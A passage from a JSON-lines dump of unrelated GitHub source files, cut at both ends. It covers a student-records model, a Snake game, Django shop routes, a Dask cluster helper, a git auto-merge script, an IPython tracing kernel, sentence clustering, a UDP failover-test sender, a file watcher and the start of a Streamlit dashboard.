self.total_enrolled_credits = str(kwargs.get(\n 'TOTAL CRÉDITOS INSCRITOS', ''))\n self.elimination_causals_number = str(kwargs.get(\n 'N° CAUSALES ELIMINACIÓN (POR SEMESTRE)', ''))\n self.valid_studies = str(kwargs.get('ESTUDIOS VIGENTES(PARALELO)', ''))\n self.invalid_studies = str(kwargs.get(\n 'ESTUDIOS NO VIGENTES(FINALIZADOS POR ALGÚN MOTIVO)', ''))\n self.licensed = str(kwargs.get('LICENCIADO', ''))\n self.licensed_at = str(kwargs.get('FECHA LIC.', ''))\n self.graduated = str(kwargs.get('EGRESADO', ''))\n self.graduated_at = str(kwargs.get('FECHA EGR.', ''))\n self.tituled = str(kwargs.get('TITULADO', ''))\n self.school_region = str(kwargs.get('COLEGIO REGIÓN', ''))\n self.school_type = str(kwargs.get('COLEGIO TIPO', ''))\n self.school_of_graduation = str(kwargs.get('COLEGIO EGRESO', ''))\n self.dsrd_current_state = str(kwargs.get('ESTADO DSRD ACTUAL', ''))\n self.admission_type = str(kwargs.get('TIPO INGRESO', ''))\n self.admission_ranking = str(kwargs.get('PUESTO', ''))\n StudentRaw.all.append(self)\n\n\nclass CourseRaw:\n all = []\n\n prop_names = {\n 'RUT': 'rut',\n 'N°ALUMNO': 'student_number',\n 'SEXO': 'sex',\n 'AÑO ADMISIÓN': 'admission_year',\n 'PROGRAMA CODIGO': 'program_code',\n 'PROGRAMA': 'program',\n 'MAJOR CODIGO SELECCIONADO': 'selected_major_code',\n 'MAJOR SELECCIONADO': 'selected_major',\n 'MAJOR TRACK/ÁREA ': 'track',\n 'MINOR CODIGO SELECCIONADO': 'selected_minor_code',\n 'MINOR SELECCIONADO': 'selected_minor',\n 'CREDITOS ALUMNO': 'student_credits',\n 'CURSO CURRICULUM': 'curriculum_course',\n 'CURSO PROGRAMA': 'program_course',\n 'AÑO': 'year',\n 'SEMESTRE': 'semester',\n 'SIGLA': 'initials',\n 'SECCIÓN': 'section',\n 'NOMBRE CURSO': 'course_name',\n 'CREDITOS CURSO': 'course_credits',\n 'NOTA FINAL': 'final_grade',\n 'NOTA FINAL ALFA': 'alpha_final_grade',\n 'PPA Global': 'global_ppa',\n 'Estado en DARA': 'dara_state',\n 'VIA INGRESO': 'admission_way',\n 'VIA CASO INGRESO': 'admission_case_way',\n }\n\n def __init__(self, **kwargs):\n self.rut = str(kwargs.get('RUT', ''))\n self.student_number = str(kwargs.get('N°ALUMNO', ''))\n self.sex = str(kwargs.get('SEXO', ''))\n self.admission_year = str(kwargs.get('AÑO ADMISIÓN', ''))\n self.program_code = str(kwargs.get('PROGRAMA CODIGO', ''))\n self.program = str(kwargs.get('PROGRAMA', ''))\n self.selected_major_code = str(kwargs.get(\n 'MAJOR CODIGO SELECCIONADO', ''))\n self.selected_major = str(kwargs.get('MAJOR SELECCIONADO', ''))\n self.track = str(kwargs.get('MAJOR TRACK/ÁREA ', ''))\n self.selected_minor_code = str(kwargs.get(\n 'MINOR CODIGO SELECCIONADO', ''))\n self.selected_minor = str(kwargs.get('MINOR SELECCIONADO', ''))\n self.student_credits = str(kwargs.get('CREDITOS ALUMNO', ''))\n self.curriculum_course = str(kwargs.get('CURSO CURRICULUM', ''))\n self.program_course = str(kwargs.get('CURSO PROGRAMA', ''))\n self.year = str(kwargs.get('AÑO', ''))\n self.semester = str(kwargs.get('SEMESTRE', ''))\n self.initials = str(kwargs.get('SIGLA', ''))\n self.section = str(kwargs.get('SECCIÓN', ''))\n self.course_name = str(kwargs.get('NOMBRE CURSO', ''))\n self.course_credits = str(kwargs.get('CREDITOS CURSO', ''))\n self.final_grade = str(kwargs.get('NOTA FINAL', ''))\n self.alpha_final_grade = str(kwargs.get('NOTA FINAL ALFA', ''))\n self.global_ppa = str(kwargs.get('PPA Global', ''))\n self.dara_state = str(kwargs.get('Estado en DARA', ''))\n self.admission_way = str(kwargs.get('VIA INGRESO', ''))\n self.admission_case_way = str(kwargs.get('VIA CASO INGRESO', ''))\n CourseRaw.all.append(self)\n\n\nif __name__ == '__main__':\n print(\"This module doesn't run code. Try running the 'main.py' file!\")\n\n # for k, v in course_prop_names.items():\n # print(\"self.{} = str(kwargs.get('{}', ''))\".format(v, k))\n","repo_name":"vjfuenzalida/process-mining-proyecto","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5783024464","text":"from turtle import Turtle\nimport time\n\nUP = 90\nDOWN = 270\nRIGHT = 0\nLEFT = 180\n\nSTARTING_POSITIONS = ((0,0),(-20,0),(-40,0))\n\n\nclass Snake:\n def __init__(self):\n self.snake = []\n self.create_snake()\n self.head = self.snake[0]\n self.speed = .1\n\n def add_dot(self, position):\n new_dot = Turtle('square')\n new_dot.color('green')\n new_dot.penup()\n new_dot.goto(position)\n self.snake.append(new_dot)\n\n def extend(self):\n self.add_dot(self.snake[-1].position())\n self.speed *= .98\n print(self.speed)\n\n def create_snake(self):\n for position in STARTING_POSITIONS:\n self.add_dot(position)\n def reset(self):\n\n for seg in self.snake:\n seg.goto(1000, 1000)\n\n self.snake.clear()\n self.create_snake()\n self.head = self.snake[0]\n self.speed = .1\n\n\n def move(self):\n time.sleep(self.speed)\n for snake_dot in range(len(self.snake) - 1, 0, -1):\n new_x = self.snake[snake_dot - 1].xcor()\n new_y = self.snake[snake_dot - 1].ycor()\n self.snake[snake_dot].goto(new_x, new_y)\n self.head.forward(20)\n\n def up(self):\n if self.head.heading() != DOWN:\n self.head.seth(UP)\n\n def down(self):\n if self.head.heading() != UP:\n self.head.seth(DOWN)\n\n def right(self):\n if self.head.heading() != LEFT:\n self.head.seth(RIGHT)\n\n def left(self):\n if self.head.heading() != RIGHT:\n self.head.seth(LEFT)\n\n","repo_name":"Sergio-rod/BootCampPythonDjango","sub_path":"day20_Snake_Game/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11169693070","text":"from django.urls import path\nfrom satchmo.product.views import IngredientsListView\nfrom satchmo.product.filterviews import display_bestsellers\n\nfrom satchmo.product.adminviews import (\n edit_inventory,\n picking_list,\n export_products,\n import_products,\n product_active_report,\n variation_manager,\n variation_list,\n)\nfrom satchmo.product.brand.views import brand_category_page\nfrom satchmo.product.views import (\n get_configurable_product_options,\n get_product,\n get_price,\n get_price_detail,\n category_view,\n category_index,\n)\n\n\nurlpatterns = [\n path(\n \"product/view/bestsellers/\",\n display_bestsellers,\n {},\n \"satchmo_product_best_selling\",\n ),\n path(\n \"product/ingredients/\", IngredientsListView.as_view(), name=\"ingredients_list\"\n ),\n path(\"product/inventory/edit/\", edit_inventory, {}, \"satchmo_admin_edit_inventory\"),\n path(\"order/picking-list/\", picking_list, {}, \"satchmo_admin_picking_list\"),\n path(\n \"product/inventory/export/\", export_products, {}, \"satchmo_admin_product_export\"\n ),\n path(\n \"product/inventory/import/\", import_products, {}, \"satchmo_admin_product_import\"\n ),\n path(\n \"product/inventory/report/\",\n product_active_report,\n {},\n \"satchmo_admin_product_report\",\n ),\n path(\n \"product/admin//variations/\",\n variation_manager,\n {},\n \"satchmo_admin_variation_manager\",\n ),\n path(\n \"product/admin/variations/\", variation_list, {}, \"satchmo_admin_variation_list\"\n ),\n path(\n \"product/configurableproduct//getoptions/\",\n get_configurable_product_options,\n {},\n \"satchmo_admin_configurableproduct\",\n ),\n path(\n \"//\",\n brand_category_page,\n {},\n name=\"satchmo_brand_category_view\",\n ),\n path(\n \"///\",\n get_product,\n {},\n \"satchmo_product\",\n ),\n path(\n \"///prices/\",\n get_price,\n {},\n \"satchmo_product_prices\",\n ),\n path(\n \"///price_detail/\",\n get_price_detail,\n {},\n \"satchmo_product_price_detail\",\n ),\n path(\"/\", category_view, {}, \"satchmo_category\"),\n path(\"\", category_index, {}, \"satchmo_category_index\"),\n]\n","repo_name":"ToeKnee/jelly-roll","sub_path":"satchmo/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2283670811","text":"import getpass, gettext\nfrom dask_gateway import Gateway, BasicAuth\nfrom distributed import Client\n\n\nclass DaskCluster:\n gateway_registry = {\n \"central-site\": \"https://dedl-centralsite.eodc.eu/dask\",\n \"bridge\": \"https://dedl-bridge.eodc.eu/dask\",\n }\n\n cluster_scale_limits = {\n \"central-site\": {\"min\": 2, \"max\": 20},\n \"bridge\": {\"min\": 2, \"max\": 10},\n }\n\n def __init__(self, name):\n self.name = name\n\n def login(self, username) -> BasicAuth:\n return BasicAuth(username, getpass.getpass())\n\n def get_gateways(self) -> None:\n for site in self.gateway_registry:\n print(f\"{site}: {self.gateway_registry[site]}\")\n\n def create_cluster(self, authobj: BasicAuth) -> None:\n self.gateway = {}\n self.cluster = {}\n self.client = {}\n\n for site in self.gateway_registry:\n # connect to gateway\n self.gateway[site] = Gateway(\n address=self.gateway_registry[site],\n auth=authobj,\n )\n # get new cluster object\n self.cluster[site] = self.gateway[site].new_cluster(\n worker_cores=1,\n worker_memory=1,\n image=\"registry.eodc.eu/eodc/dedl_demo:1.0\",\n )\n self.cluster[site].adapt(\n minimum=self.cluster_scale_limits[site][\"min\"],\n maximum=self.cluster_scale_limits[site][\"max\"],\n )\n self.client[site] = Client(self.cluster[site], set_as_default=False)\n\n def get_cluster_url(self):\n for site in self.gateway_registry:\n print(self.cluster[site].dashboard_link)\n\n def shutdown(self):\n for site in self.gateway_registry:\n self.cluster[site].close()\n","repo_name":"eodcgmbh/DEDL-Demonstrator","sub_path":"dedl/services/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"2407626093","text":"import sys\nimport argparse\nimport subprocess\n\n# Assume byte encoding to be \"utf-8\" compatible.\nglobal ENCODING\nENCODING = \"utf-8\"\n\n\ndef parser():\n \"\"\"\n Parses argument from the command line.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"auto merge with comments\")\n\n parser.add_argument(\n \"-u\", \"--use\", help=\"SHA1 commit preference hash.\", required=True)\n parser.add_argument(\"-c\", \"--commitify\",\n help=\"SHA1 commit comment hash.\", required=True)\n parser.add_argument(\n \"-b\", \"--branch\", help=\"Output branch name\", required=True)\n parser.add_argument(\n \"-p\", \"--prefix\", help=\"Prefix String of the comment.\", required=True)\n\n arguments = parser.parse_args()\n\n return arguments\n\n\ndef evaluate_file(changed_file, prefix):\n \"\"\"\n Evaluates the changed_file and outputs the list of new lines for the\n file.\n\n Args:\n changed_file: The file to be evaluated.\n prefix: The comment prefix of the commitify_branch.\n\n Returns:\n List of new lines for the changed_file.\n \"\"\"\n # Constants.\n PREFERENCE_ARROW = \">>>>>>>\"\n DIVIDER = \"=======\"\n COMMITIFY_ARROW = \"<<<<<<<\"\n\n commitify_flag = False\n new_file_lines = []\n with open(changed_file, \"r\") as file_lines:\n for line in file_lines:\n if ((PREFERENCE_ARROW in line) or (COMMITIFY_ARROW in line)):\n commitify_flag = False\n continue\n elif (DIVIDER in line):\n commitify_flag = True\n continue\n\n if (commitify_flag):\n new_file_lines.append(prefix + line)\n else:\n new_file_lines.append(line)\n\n return new_file_lines\n\n\ndef write_new_file(changed_file, new_file_lines):\n \"\"\"\n Overwrite the changed_file with a list of lines.\n\n Args:\n changed_file: The file name to overwrite.\n new_file_lines: The List of lines to write.\n\n Returns:\n Nothing.\n \"\"\"\n with open(changed_file, \"w\") as file_lines:\n for line in new_file_lines:\n file_lines.write(line)\n\n\ndef update_files(changed_files, prefix):\n \"\"\"\n Scans a list of files and resolves the merge changes.\n\n Args:\n changed_files: The list of files that have been changed.\n prefix: The comment prefix to append to the commitify\n branch.\n\n Returns:\n Nothing.\n \"\"\"\n for changed_file in changed_files:\n if (changed_file == \"\"):\n break\n\n new_file_lines = evaluate_file(changed_file, prefix)\n write_new_file(changed_file, new_file_lines)\n\n\ndef auto_merge(preference_branch, commitify_branch, output_branch, prefix):\n \"\"\"\n Performs the auto_merge function.\n\n Args:\n preference_branch: The branch to take preference of changes.\n commitify_branch: The branch to comment out changes with\n supplied prefix.\n output_branch: The branch where to output the merge files.\n prefix: The prefix for the comment of the supplied\n comment.\n\n Returns:\n Nothing.\n \"\"\"\n # Switch to output_branch.\n subprocess.run([\"git\", \"checkout\", output_branch])\n\n # Begin to merge branches.\n subprocess.run([\"git\", \"merge\", preference_branch, commitify_branch])\n\n # Get changed files name\n changed_files_command = subprocess.run(\n [\"git\", \"diff\", \"--name-only\", \"--diff-filter=U\"], stdout=subprocess.PIPE)\n changed_files = changed_files_command.stdout.decode(ENCODING).split(\"\\n\")\n\n update_files(changed_files, prefix)\n\n\ndef main():\n \"\"\"\n Driver Function.\n \"\"\"\n arguments = parser()\n\n auto_merge(arguments.use, arguments.commitify,\n arguments.branch, arguments.prefix)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lamdav/AdvancedGit","sub_path":"homework04/src/auto_merge_with_comments.py","file_name":"auto_merge_with_comments.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26587823589","text":"from __future__ import absolute_import\n\nfrom ipykernel.ipkernel import IPythonKernel\nfrom networkx.readwrite import json_graph\nfrom traitlets import Bool, Enum, Instance, Type, default\n\nfrom ..core.annotator import Annotator\nfrom ..core.flow_graph import flow_graph_to_graphml\nfrom ..core.flow_graph_builder import FlowGraphBuilder\nfrom ..core.graphml import write_graphml_str\nfrom ..core.remote_annotation_db import RemoteAnnotationDB\nfrom ..trace.tracer import Tracer\nfrom .serialize import object_to_json\nfrom .shell import FlowGraphIPythonShell\nfrom .slots import get_slots\n\n\nclass FlowGraphIPythonKernel(IPythonKernel):\n \"\"\" IPython kernel with support for program analysis and object inspection.\n \"\"\"\n \n # Whether to simplify the flow graph by removing some/all outputs.\n # See `flow_graph.flow_graph_to_graphml`.\n flow_graph_outputs = Enum(\n ['all', 'simplify', 'none'], default_value='simplify').tag(config=True)\n \n # Whether to store annotated slots of objects in the flow graph.\n # See `flow_graph_builder.FlowGraphBuilder`.\n flow_graph_slots = Bool(True).tag(config=True)\n \n # Annotator for objects and functions.\n annotator = Instance(Annotator)\n \n # `IPythonKernel` traits.\n shell_class = Type(FlowGraphIPythonShell)\n \n # Private traits.\n _builder = Instance(FlowGraphBuilder)\n _tracer = Instance(Tracer, args=())\n _trace_flag = Bool()\n\n # `FlowGraphIPythonKernel` interface\n \n def get_object(self, obj_id):\n \"\"\" Get a tracked object by ID.\n \"\"\"\n return self._tracer.object_tracker.get_object(obj_id)\n \n def get_object_id(self, obj):\n \"\"\" Get the ID of a tracked object.\n \"\"\"\n return self._tracer.object_tracker.get_id(obj)\n \n # `KernelBase` interface\n \n def do_execute(self, code, silent, *args, **kwargs):\n \"\"\" Reimplemented to perform tracing.\n \"\"\"\n # Do execution, with tracing unless the execution request is `silent`.\n self._builder.reset()\n self._trace_flag = not silent\n reply_content = super(FlowGraphIPythonKernel, self).do_execute(\n code, silent, *args, **kwargs)\n \n # Add flow graph as a payload.\n if self._trace_flag and reply_content['status'] == 'ok':\n graph = self._builder.graph\n graphml = flow_graph_to_graphml(\n graph, outputs=self.flow_graph_outputs)\n data = write_graphml_str(graphml, prettyprint=False)\n payload = {\n 'source': 'flow_graph',\n 'mimetype': 'application/graphml+xml',\n 'data': data,\n }\n reply_content['payload'].append(payload)\n \n return reply_content\n \n def inspect_request(self, stream, ident, parent):\n \"\"\" Reimplemented to handle inspect requests for annotated objects.\n \"\"\"\n content = parent['content']\n if 'object_id' not in content:\n return super(FlowGraphIPythonKernel, self).inspect_request(\n stream, ident, parent)\n\n obj_id = content['object_id']\n obj = self.get_object(obj_id)\n if obj is None:\n reply_content = {\n 'status': 'ok',\n 'found': False,\n 'data': {},\n 'metadata': {},\n }\n else:\n inspect_data = get_slots(obj, content['slots'])\n reply_content = {\n 'status': 'ok',\n 'found': True,\n 'data': {\n 'application/json': object_to_json(inspect_data),\n },\n 'metadata': {},\n }\n \n msg = self.session.send(stream, 'inspect_reply',\n reply_content, parent, ident)\n self.log.debug(\"%s\", msg)\n \n # Trait initializers\n \n @default('annotator')\n def _annotator_default(self):\n # Inherit database config from kernel.\n db = RemoteAnnotationDB(parent=self)\n return Annotator(db=db)\n \n @default('_builder')\n def _builder_default(self):\n builder = FlowGraphBuilder(\n annotator=self.annotator,\n store_slots=self.flow_graph_slots,\n )\n\n def handler(changed):\n event = changed['new']\n if event:\n builder.push_event(event)\n self._tracer.observe(handler, 'event')\n \n return builder\n","repo_name":"IBM/pyflowgraph","sub_path":"flowgraph/kernel/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"} +{"seq_id":"7130448154","text":"import os\nimport time\nimport threading\n\nfrom .event import Event\n\n\nclass Observer(threading.Thread):\n \"\"\"Observe change in file FileSystem\n \"\"\"\n def __init__(self):\n \"\"\"Class instantiation\n \"\"\"\n super().__init__()\n self.signatures = {}\n self.handlers = {}\n self.terminated = False\n\n def add_handler(self, path, handler):\n \"\"\"Add a path in watch queue\n \"\"\"\n self.signatures[path] = self.get_path_signature(path)\n self.handlers[path] = handler\n\n def get_path_signature(self, path):\n \"\"\"generate a unique signature for file contained in path\n \"\"\"\n if not os.path.exists(path):\n return None\n if os.path.isdir(path):\n merge = {}\n for root, dirs, files in os.walk(path):\n for name in files:\n full_name = os.path.join(root, name)\n merge[full_name] = os.stat(full_name)\n return merge\n else:\n return os.stat(path)\n\n def check(self):\n \"\"\"Check if a file is changed\n \"\"\"\n for (path, handler) in self.handlers.items():\n current_signature = self.signatures[path]\n new_signature = self.get_path_signature(path)\n if new_signature != current_signature:\n self.signatures[path] = new_signature\n handler.on_change(Event(path))\n\n def run(self):\n \"\"\"Main loop of observer's thread. looks for changes in one of paths and call on_change of EventHandler\n \"\"\"\n while not self.terminated:\n self.check()\n time.sleep(0.2)\n\n def stop(self):\n \"\"\"Stop thread loop\n \"\"\"\n self.terminated = True\n","repo_name":"SolutionsCloud/apidoc","sub_path":"apidoc/lib/fswatcher/observer.py","file_name":"observer.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"32"} +{"seq_id":"74944033370","text":"#chatbot에 많이 사용. hugging face에서 한국어 문장 슷지 벡터로 변환시켜 긍/부정을 판단해보자.\nfrom sentence_transformers import SentenceTransformer\nfrom sklearn.cluster import KMeans\nimport json\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nmodel = SentenceTransformer('jhgan/ko-sroberta-multitask')\nsentences = [\"안녕하세요?\", \"한국어 문장 임베딩을 위한 버트 모델입니다.\"]\nembeddings = model.encode(sentences)\n\n#print(embeddings)\n\nsentences = ['한 남자가 음식을 먹는다.',\n '한 남자가 빵 한 조각을 먹는다.',\n '그 여자가 아이를 돌본다.',\n '한 남자가 말을 탄다.',\n '한 여자가 바이올린을 연주한다.',\n '두 남자가 수레를 숲 속으로 밀었다.',\n '한 남자가 담으로 싸인 땅에서 백마를 타고 있다.',\n '원숭이 한 마리가 드럼을 연주한다.',\n '치타 한 마리가 먹이 뒤에서 달리고 있다.',\n '한 남자가 파스타를 먹는다.',\n '고릴라 의상을 입은 누군가가 드럼을 연주하고 있다.',\n '치타가 들판을 가로 질러 먹이를 쫓는다.']\n\nembeddings = model.encode(sentences)\n\n#kmeans 사용 위해 cluster 개수 지정\nnum_clusters = 5\nclustering_model = KMeans(n_clusters=num_clusters)\n#cluster 모델 학습\nclustering_model.fit(embeddings)\n#label 저장\ncluster_assignment = clustering_model.labels_\n\nclustered_sentences = [[] for i in range(num_clusters)]\n# for sentence_id, cluster_id in enumerate(cluster_assignment):\n# clustered_sentences[cluster_id].append(sentences[sentence_id])\n#\n# for i, cluster in enumerate(clustered_sentences):\n# print(\"Cluster \", i+1)\n# print(cluster)\n# print(\"\")\n\n#본격적인 코드, Crawling.py에서 저장한 .csv 파일 불러와 monster hunter rise 댓글을 clustering한다.\ndf = pd.read_csv('../Cluster/reviews_ko.csv')\n\ncorpus = df['review'].values.tolist()\n\nembeddings = model.encode(corpus)\n\nnum_clusters = 3\nclustering_model = KMeans(n_clusters=num_clusters)\nclustering_model.fit(embeddings)\ncluster_assignment = clustering_model.labels_\n\nclustered_sentences = [[] for i in range(num_clusters)]\nfor sentence_id, cluster_id in enumerate(cluster_assignment):\n clustered_sentences[cluster_id].append(corpus[sentence_id])\n\nfor i, cluster in enumerate(clustered_sentences):\n print('Cluster %d (%d)' % (i+1, len(cluster)))\n print(cluster)\n print('')\ndf['voted_up'].value_counts().plot(kind='bar', title='Voted Up')\nplt.title(\"Monster Hunter Rise Like/Hate\")\n\nplt.show()","repo_name":"Yuminkyeong/2022Pytorch","sub_path":"Cluster/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29265538178","text":"\"\"\"Через ввод с командной строки вводишь subid и тебе выводит статистику по этому subid\r\nв следующем формате:\r\nВсего заказов: xxx (+)\r\nСамый крупный заказ: на сумму xxx рублей по офферу xxx (+)\r\nСреднее количество заказов в день: xxx\r\nОбщая сумма выплаченной комиссии по subid: общая сумма комиссии. (+)\r\nКоличество заказов, по которым ожидается выплата: Количество (+)\r\n\"\"\"\r\nimport pub_api_1\r\n\r\n\r\ndef file(raw, subid):\r\n file = []\r\n for lst in raw:\r\n if lst[5] == subid:\r\n file.append(lst)\r\n return file\r\n\r\n\r\ndef max_order(file):\r\n prices = []\r\n for i in range(len(file)):\r\n if file[i][1] is not None:\r\n prices.append(file[i][1])\r\n else:\r\n prices.append(0.0)\r\n zakaz = 0\r\n for order in file:\r\n if order[1] == max(prices):\r\n zakaz = order[6]\r\n return [max(prices), zakaz]\r\n\r\n\r\ndef commission_approved(file):\r\n s = 0\r\n for order in file:\r\n if order[7] == 'approved' and order[4] == 1:\r\n s += order[3]\r\n return s\r\n\r\n\r\ndef amount_payout(file):\r\n i = 0\r\n for order in file:\r\n if order[4] == 1:\r\n i += 1\r\n return i\r\n\r\n\r\nsubid = input('Введите subid (Тилли/Вилли/Дилли): ')\r\nif subid not in ['Тилли', 'Вилли', 'Дилли']:\r\n print('Не балуйся! Запусти программу снова.')\r\nelse:\r\n raw = pub_api_1.orders(pub_api_1.data())\r\n file = file(raw, subid)\r\n print(f'Всего заказов: {len(file)}')\r\n print(f'Самый крупный заказ: на сумму {max_order(file)[0]} рублей по офферу {max_order(file)[1]}')\r\n print(f'Среднее количество заказов в день: {len(file)/30}')\r\n print(f'Общая сумма выплаченной комиссии по subid: {commission_approved(file)}')\r\n print(f'Количество заказов, по которым ожидается выплата: {amount_payout(file)}')\r\n","repo_name":"JuliaSavochkina/Git_homeworks","sub_path":"pub_api_2.py","file_name":"pub_api_2.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38557330893","text":"\nclass Light():\n\n\tdescription = 'A filming light'\n\n\tdef __init__( self, name ):\n\t\tself.name = name\n\t\tself.brightness = 0\n\t\tself.colorTemperature = 0\n\t\tself.blueBrightness = 0\n\t\tself.redBrightness = 0\n\t\tself.hue = 0\n\n\tdef update( self, **kwargs ):\n\t\tself.brightness = kwargs.get('brightness', self.brightness)\n\t\tself.colorTemperature = kwargs.get('colorTemperature', self.colorTemperature)\n\t\tself.blueBrightness = kwargs.get('blueBrightness', self.blueBrightness)\n\t\tself.redBrightness = kwargs.get('redBrightness', self.redBrightness)\n\t\tself.hue = kwargs.get('hue', self.hue)\n\n\tdef as_dict( self ):\n\t\treturn dict(\n\t\t\tname = self.name,\n\t\t\tbrightness = self.brightness,\n\t\t\tcolorTemperature = self.colorTemperature,\n\t\t\tblueBrightness = self.blueBrightness,\n\t\t\thue = self.hue,\n\t\t\tredBrightness = self.redBrightness\n\t\t)\n\nlights = dict(\n\tleft = Light('left'),\n\tright = Light('right')\n)\n\ndef listAll():\n\tjsonable = {}\n\tfor name in lights:\n\t\tjsonable[name] = {}\n\t\tjsonable[name]['url'] = '/lights/%s' % name\n\t\tjsonable[name]['name'] = name\n\t\tjsonable[name]['description'] = lights[name].description\n\treturn jsonable\n\ndef getAll():\n\tjsonables = []\n\tfor name in lights:\n\t\tjsonables.append( lights[name].as_dict() )\n\treturn jsonables\n\ndef get( name ):\n\treturn lights[name].as_dict()\n\ndef post( light, name ):\n\n\t_light = lights[name]\n\t_light.update( **light )\n\n\treturn _light.as_dict() \n","repo_name":"ippo615/experiments","sub_path":"swagger.io/04-light-rig/controllers/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"428950686","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n##################################################\r\n## UDP Sender\r\n##################################################\r\n## GNU Affero General Public License v3.0\r\n##################################################\r\n## Author: Hartwig Tronnier\r\n## Co-Author: Eric Sobian\r\n## Version: 1.1.1\r\n## Maintainer: Hartwig Tronnier\r\n## Email: hartwig-git@online.de\r\n## Status: BETA\r\n##################################################\r\n##\r\n## Purpose of this program:\r\n## send a constant stream of sequentially numbered udp packets to a destination ip/port\r\n## on the receiver side the partner program 'udplisten' watches for these packets \r\n## and reports any missing/duplicate/out-of-sequence packets\r\n##\r\n## We use this in network environments to measure convergence times in case of redundancy failovers\r\n##\r\n## Typically, each test client sends to every other client and listens for every other client\r\n##\r\n###################################################\r\n\r\nimport asyncio, sys, getopt\r\nimport socket\r\nimport struct\r\nfrom threading import Timer\r\nfrom time import sleep\r\n\r\n## The asyncio construct is used to send timed packets without blocking the cpu\r\n## since my use case involved starting many instances on each computer\r\n## I used 10 instances on Raspberry Pi 3, Eric had 110 instances on virtual x86 machines\r\n\r\n \r\n@asyncio.coroutine\r\ndef ping(mysock):\r\n cnt=1\r\n while True:\r\n yield from asyncio.sleep(.009)\r\n message = struct.pack('>L',cnt)\r\n mysock.sendto(message,(UDP_IP,UDP_PORT))\r\n cnt += 1\r\n \r\n \r\n \r\nUDP_IP = \"::1\"\r\nUDP_PORT = 0\r\nUDP_PROTO=socket.AF_INET6\r\n\r\nusage = \"udpsend -a IP(v6)-address -p port -v Version(4 or 6)\"\r\n\r\n \r\n\r\n \r\n\r\ntry:\r\n opts, args = getopt.getopt(sys.argv[1:], \"ha:p:v:\",[\"help\",\"address=\",\"port=\",\"version=\"])\r\nexcept getopt.GetoptError:\r\n print (usage)\r\n sys.exit(2)\r\nfor opt, arg in opts:\r\n if opt in ('-h','--help'):\r\n print ('UDP sender:\\n')\r\n print ('sends numbered packets to
:\\n')\r\n print (usage)\r\n sys.exit(2)\r\n elif opt in (\"-a\",\"--address\"):\r\n UDP_IP = arg\r\n elif opt in (\"-p\",\"--port\"):\r\n UDP_PORT = int(arg)\r\n elif opt in (\"-v\",\"--version\"):\r\n if int(arg)==4:\r\n UDP_PROTO=socket.AF_INET\r\n\r\nif UDP_PORT==0:\r\n print (\"No port given!\\n udplisten -o outfile -p port\")\r\n sys.exit(2)\r\n\r\n \r\nprint(\"UDP send to \",UDP_IP,\":\",UDP_PORT,\" press ^C to abort\\n\") \r\nsock = socket.socket(UDP_PROTO, socket.SOCK_DGRAM) # UDP\r\n\r\nloop = asyncio.get_event_loop()\r\ntry:\r\n asyncio.ensure_future(ping(sock))\r\n loop.run_forever()\r\nexcept KeyboardInterrupt:\r\n print(\"Stopping ...\")\r\nfinally:\r\n loop.close()\r\n sleep(1)\r\n sock.close()\r\n\r\n","repo_name":"hartwigt/udpping","sub_path":"udpsend_v1.1.1.py","file_name":"udpsend_v1.1.1.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38221196643","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nx = np.array([10, 20, 30, 40, 50, 60])\r\ny = np.array([200, 400, 600, 800, 1000, 1200])\r\n\r\nfont1 = {'family': 'Arial', 'color': 'red', 'size': 20}\r\nfont2 = {'family': 'Arial', 'color': 'black', 'size': 15}\r\n\r\nplt.title(\"Rice Consumption\",fontdict=font1)\r\nplt.xlabel(\"No.of people(in millions)\", fontdict=font2)\r\nplt.ylabel(\"Amount of rice consumed(in tonnes)\",fontdict=font2)\r\n\r\nplt.grid(color = 'green',ls = '--',lw = 0.5)\r\nplt.plot(x,y)\r\nplt.show()\r\n\r\n\r\n","repo_name":"joeljohngeorge/matplot-tutorial-codes","sub_path":"labelplot.py","file_name":"labelplot.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22746667495","text":"# Librasies \nfrom haversine import haversine\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n# importando biblioteca\nimport pandas as pd\nimport streamlit as st\nfrom PIL import Image\nimport folium\nfrom streamlit_folium import folium_static\n\nst.set_page_config( page_title='Visão Empresa', page_icon='📈', layout='wide' )\n\n# --------------------------------------------------#\n# Funções \n# --------------------------------------------------#\n\n# Função country_maps\ndef country_maps( df1 ):\n \n \"\"\"\n A função country_maps(df1) recebe um objeto DataFrame chamado df1 como parâmetro. O código da função faz o seguinte:\n\n Cria um novo objeto 